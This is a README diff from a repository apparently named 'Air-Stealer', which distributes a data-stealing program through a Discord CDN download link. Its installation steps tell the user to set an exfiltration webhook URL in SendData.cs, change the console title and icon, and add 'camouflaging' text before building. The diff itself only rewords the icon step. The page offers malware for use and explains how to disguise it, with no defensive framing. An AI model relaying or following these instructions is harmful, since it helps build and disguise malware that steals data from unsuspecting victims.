decries/Air-Stealer/README.md

 I had problems uploading whole source code here, so download using [THIS](https://cdn.discordapp.com/attachments/821125472813318174/856589234504597514/Air-Stealer.rar) button.
 ## Installation

 In SendData.cs change the webhook URL.
 In Program.cs change console Title to what you want.
-Change Icon
+Change the application Icon.
 **You can add more camouflaging by adding more text and things!**

 Build it, and it's ready to go.